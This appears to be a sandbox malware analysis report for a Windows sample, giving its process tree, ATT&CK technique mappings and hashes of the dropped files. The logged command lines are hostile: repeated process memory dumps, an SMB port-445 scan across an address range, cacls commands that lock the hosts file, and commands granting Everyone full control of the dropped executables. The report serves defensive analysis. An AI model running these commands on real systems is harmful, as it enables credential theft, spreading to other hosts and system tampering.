- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1480
-
-
C:\Windows\TEMP\bpzelrleu\gtfbuuhyt.exeC:\Windows\TEMP\bpzelrleu\gtfbuuhyt.exe -accepteula -mp 4004 C:\Windows\TEMP\bpzelrleu\4004.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2596
-
-
C:\Windows\TEMP\bpzelrleu\gtfbuuhyt.exeC:\Windows\TEMP\bpzelrleu\gtfbuuhyt.exe -accepteula -mp 5108 C:\Windows\TEMP\bpzelrleu\5108.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3412
-
-
C:\Windows\TEMP\bpzelrleu\gtfbuuhyt.exeC:\Windows\TEMP\bpzelrleu\gtfbuuhyt.exe -accepteula -mp 2708 C:\Windows\TEMP\bpzelrleu\2708.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4460
-
-
C:\Windows\TEMP\bpzelrleu\gtfbuuhyt.exeC:\Windows\TEMP\bpzelrleu\gtfbuuhyt.exe -accepteula -mp 4516 C:\Windows\TEMP\bpzelrleu\4516.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1372
-
-
C:\Windows\TEMP\bpzelrleu\gtfbuuhyt.exeC:\Windows\TEMP\bpzelrleu\gtfbuuhyt.exe -accepteula -mp 2812 C:\Windows\TEMP\bpzelrleu\2812.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2460
-
-
C:\Windows\TEMP\bpzelrleu\gtfbuuhyt.exeC:\Windows\TEMP\bpzelrleu\gtfbuuhyt.exe -accepteula -mp 4196 C:\Windows\TEMP\bpzelrleu\4196.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3344
-
-
C:\Windows\TEMP\bpzelrleu\gtfbuuhyt.exeC:\Windows\TEMP\bpzelrleu\gtfbuuhyt.exe -accepteula -mp 840 C:\Windows\TEMP\bpzelrleu\840.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3856
-
-
C:\Windows\TEMP\bpzelrleu\gtfbuuhyt.exeC:\Windows\TEMP\bpzelrleu\gtfbuuhyt.exe -accepteula -mp 2532 C:\Windows\TEMP\bpzelrleu\2532.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3884
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\bpzelrleu\etctgsilg\scan.bat2⤵PID:4348
-
C:\Windows\bpzelrleu\etctgsilg\qgchhgsrs.exeqgchhgsrs.exe TCP 191.101.0.1 191.101.255.255 445 512 /save3⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:2088
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵PID:4104
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3840
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:1524
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3096
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:1400
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:5096
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:6000
-
-
-
C:\Windows\SysWOW64\dipzew.exeC:\Windows\SysWOW64\dipzew.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:448
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\yaytfet.exe1⤵PID:64
-
C:\Windows\ime\yaytfet.exeC:\Windows\ime\yaytfet.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1212
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\nflfrgth\yaytfet.exe /p everyone:F1⤵PID:1148
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:4640
-
-
C:\Windows\system32\cacls.execacls C:\Windows\nflfrgth\yaytfet.exe /p everyone:F2⤵PID:2784
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\syfgusilh\qesayc.exe /p everyone:F1⤵PID:3188
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:4736
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\syfgusilh\qesayc.exe /p everyone:F2⤵PID:468
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\yaytfet.exe1⤵PID:5472
-
C:\Windows\ime\yaytfet.exeC:\Windows\ime\yaytfet.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5116
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\nflfrgth\yaytfet.exe /p everyone:F1⤵PID:4976
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:2900
-
-
C:\Windows\system32\cacls.execacls C:\Windows\nflfrgth\yaytfet.exe /p everyone:F2⤵PID:5116
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\syfgusilh\qesayc.exe /p everyone:F1⤵PID:5128
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:4016
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\syfgusilh\qesayc.exe /p everyone:F2⤵PID:3580
-
Network
MITRE ATT&CK Enterprise v15
Execution
Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
95KB
MD586316be34481c1ed5b792169312673fd
SHA16ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA25649656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA5123a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize
275KB
MD54633b298d57014627831ccac89a2c50b
SHA1e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA51229590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize
4.2MB
MD5184c06fd146ce0b3bdaed2afe97078c7
SHA1a8470de0bc33823aae00d95f912c37f77a73c1c0
SHA2566a8170ea5dab6be888d6be4d51c69f22f34edbc80815f8903f5ce353fb43bae6
SHA512c1cb9cbafe356174bdef62da77b19232a1c42cc5126dc14d9735b4cd7373b631c4ce882d960c453a3a68fd38536db263eaa8d1b79da753ff06956899f3d0b2c3
-
Filesize
3.9MB
MD5777352a360e411989db3d47f05c1c526
SHA1a840473cc842fd5a24fc2cd52b31eb7197cba9d1
SHA2569352b8d065e933dfe137b43c5216eddd6232ca53ad094d7f9b05a1ce66bb3495
SHA5127911685926ea915660cb72db7346db06356c98ddbc34a3a678d69e92006a0197e3635ddc0423dc67aa9477d41eca757f674445604df988334727cee6e63c5fc2
-
Filesize
26.1MB
MD59314deefdaff2557d86fec3d2876fcb3
SHA18786a1462ca43f057d9871b3a6a038153f9ba368
SHA2569b257d72066ce8ee3d2de3d3a5d7b10411f62fcbfde44948c61acda157d8cad5
SHA512f887296e5d12477805290d7993e509620197c0bf42d4f38434efa7117c42c53ac4dc98b8d1b3c6b11413b6ed0a81ac866c612b54272c79fe61cee78496a85277
-
Filesize
7.5MB
MD573a39fb2bf474607c7aa625f2691e712
SHA198a065a789b720c741626c5190335532d9a31ed7
SHA2569611fce2781fde913ccd092e760a85ba6beafc9a3fb3c9c26075bc316a5f9881
SHA512128187d696eff5975bd48758486ea9e94830689eabab44cdbba450b4d06c7e00fc217a17ebed8292f6499dd4650e3bdbf7505797021f96dff12a57d6a5b4b32d
-
Filesize
2.9MB
MD503dee216881ff4d2b9f99b2f626233b6
SHA17aed6c178913b4b13e48463eac580a3bb0792dd3
SHA25666cf1f44d29abf3af4940aa9eafda01be44b8ab2670dd07ab1e468de154e4c6d
SHA512725b322f02bdfd4608a9a0e4819cc262ee3405fa6e80d2b6e95a8b18ccb15af69492e33bec878d4e589d13c91d59476aa3fc362a38b5188e002b9e91af463f44
-
Filesize
2.9MB
MD5574eac78dc1f039a6002076ebb608610
SHA1e0b5e36388110b26dc8c8f7bf69bdbcfc549ebdb
SHA256587682d23714105c605d69264aa8bd4ebf80cf3967bb4fb53c59d3760bdb64a4
SHA512d0fe43095094befe1c5973101c171096556ef7e54f5dec697c1d2c016a76a848f6a7a39ccb136b4405c64c7ac0567a3d0b3258a5970df0788a4bcef88c56a6fe
-
Filesize
822KB
MD5b03527d4c78a5e761406e23ef13e48ff
SHA12123649f1f12e8cf85466da999f8589afcafdafb
SHA2563e30d9135bd754992a8d836b370ed659342337337804f3bd5e8ba35ee1b4f741
SHA512ff0d6ad1c3ec22d9c81b84169b38433d5d2307b38af9ea70ef1a0602b0d34a989cfba7a8d2c0fc6dc80a605860af5f210521b339b7f958da7f719dbbe9de6e85
-
Filesize
2.7MB
MD57293b0e46394213a24b67d730acf5d29
SHA14ada42a6d4d847586ce79e0c9c45ac0415994f24
SHA2565216014bafec618193145da29d9a323433e560f7166bb4f011cfa5b91cf615b8
SHA51280dc67c304d8d776e1dbc17d96ea760f1df18c885e963e27cb061da6232db2b5b4627ecb4361d86cca20829b813c90a1c9abbbb60f41fbcc1bd7be71949804ae
-
Filesize
33.4MB
MD5f3851b7ed9c04cb51a596f8759f800ba
SHA1316313ad85e0ed8f85a3fadf6d07e30cec5d4980
SHA2569babbafdf44045af0c135bf36fc2b7860b31a0515869b9a4ff4f81cce8527c3e
SHA5123003d6a54479fe0905cdfa8d13644e9b140078b9dccb6e2723775d44593193f063c1e1703544e8a30e11bf16816365b863c9f65face9b135ec3df2c0df46f90f
-
Filesize
20.8MB
MD5ac18542a81a72bab19810cf67c084136
SHA16a81da223be1373f0c75346f80d20090985381a4
SHA256f2a331f97797862b047791a446a22a57e30b1cd91bb238fbaf146145a03ccf3d
SHA51253b14f40e45d1b14957763bd0379cf4ee2048353a652a7b10197db09a288d9ae072b4cfde08d1ef5fe1dc6ba093d04ba579a2725ddd002b91ffb9fc3c23f2150
-
Filesize
8.6MB
MD51f993f7be8f9f44b196ca59dfe8adef7
SHA1e439f8f06c1e3579353f845c223777e07c8e5408
SHA256780d9f5130ce6fb354a2dca45171871f227d7484780bd7ccda1e1c12b65ed4a6
SHA512d8d3155da9f9569c92f722dfa45c7388fe65d3dd6ef62a50030b8c35c09bf994f9d0b45c6a5930366b72e6b1e8537383e63a657b1ec095e4235a1eacc1552ffb
-
Filesize
45.7MB
MD505389dab56f658af90908bbc89422caf
SHA1c80e07311a417360d6f1c5c6496254cafaa4c433
SHA256391bfc549b797eabffdfa6b4e7124163a9f8d25a66106256b9d7c5d86201286f
SHA512227a9d7cac64bcdd337722de84ad3b313dcdc49a1ddb4013664b81297e9561845979cf15ddeb6074757ef8def5665448467852c30de6e906bc7255d3da2bc216
-
Filesize
8.9MB
MD50ac60c8145fdbe76ae4cc5f2b8a87ba5
SHA12cb40d0aac23ffc378e91823d7a3f264f67fea56
SHA256247f6d580b7e2681533e9013a14a52a4d589eea7a0c23aaa21b26c56c90a5c7c
SHA512f1ca6193c9c88f7bea8e1bf826ba8133fa73bd4bae9bfc0670a93bc5a907e9b96bb5f2a041dd5514f48000f8b14e8c0bb3c1662c4cd5e09356a184dfed33073f
-
Filesize
1.2MB
MD54152e7ebcc1069e21dd52c60733aeaa7
SHA1586ef1f67de4ef48b9d0fc6d43d42c006b636a6e
SHA2560ea79537513ab35dd8e532fb742da3a80f4d1fd8e06a081fc00199d9ccd2fdea
SHA51249bfbf67d2209746f69e81e48453744690e0216e73e7b7e12fbebcd07c9f66a138f47b70fd0991c8b6aebd4247aec5fc2222983bb3a06cd53af74ee3adcfd280
-
Filesize
1019KB
MD5df99d2018ca0aa4764dfcda570b7c526
SHA1cb4edf3534f38895d3a604fd97851d5a50a32a09
SHA256be19dda761c1996b6e4c91df07faebf4dd4eaca40e96bc0a98ad7d9521d02cd4
SHA512de6fd37b515f20c54d7943c0405700f5ce81daca2950a76a6d8d3b4167a583804a937491bf0ed2e843d8cb73bf70b155b1511fc298146a3ab162b34d025aaf81
-
Filesize
693B
MD5f2d396833af4aea7b9afde89593ca56e
SHA108d8f699040d3ca94e9d46fc400e3feb4a18b96b
SHA256d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34
SHA5122f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01
-
Filesize
126KB
MD5e8d45731654929413d79b3818d6a5011
SHA123579d9ca707d9e00eb62fa501e0a8016db63c7e
SHA256a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af
SHA512df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6
-
Filesize
11KB
MD52ae993a2ffec0c137eb51c8832691bcb
SHA198e0b37b7c14890f8a599f35678af5e9435906e1
SHA256681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59
SHA5122501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9
-
Filesize
6KB
MD5b648c78981c02c434d6a04d4422a6198
SHA174d99eed1eae76c7f43454c01cdb7030e5772fc2
SHA2563e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9
SHA512219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2
-
Filesize
343KB
MD52b4ac7b362261cb3f6f9583751708064
SHA1b93693b19ebc99da8a007fed1a45c01c5071fb7f
SHA256a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23
SHA512c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616
-
Filesize
72KB
MD5cbefa7108d0cf4186cdf3a82d6db80cd
SHA173aeaf73ddd694f99ccbcff13bd788bb77f223db
SHA2567c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9
SHA512b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1
-
Filesize
381KB
MD5fd5efccde59e94eec8bb2735aa577b2b
SHA151aaa248dc819d37f8b8e3213c5bdafc321a8412
SHA256441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45
SHA51274a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3
-
Filesize
332KB
MD5ea774c81fe7b5d9708caa278cf3f3c68
SHA1fc09f3b838289271a0e744412f5f6f3d9cf26cee
SHA2564883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38
SHA5127cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb
-
Filesize
424KB
MD5e9c001647c67e12666f27f9984778ad6
SHA151961af0a52a2cc3ff2c4149f8d7011490051977
SHA2567ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d
SHA51256f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe
-
Filesize
8.0MB
MD5be839e2e5f3ec99b0ac692b8907911c8
SHA16cd5d7f0901170c8e044b8cb44bd2c3f4af80f5a
SHA2569bd9cbedf569fc4223d36243c3d0868178294740025b8b829446626f48b8b183
SHA5128adb2bc781c34f0eaaf40e8dc05c1bc36d71693f0582daf8661ab489c4c1396375641c4de812ccd18009919bfeeeef8ec8a7e0b7f92c24c28f2d4a8f2cba9a35
-
Filesize
1KB
MD5c838e174298c403c2bbdf3cb4bdbb597
SHA170eeb7dfad9488f14351415800e67454e2b4b95b
SHA2561891edcf077aa8ed62393138f16e445ef4290a866bccdbb7e2d7529034a66e53
SHA512c53a52b74d19274c20dece44f46c5d9f37cd0ec28cf39cac8b26ba59712f789c14d1b10b7f5b0efdf7ce3211dda0107792cc42503faa82cb13ffae979d49d376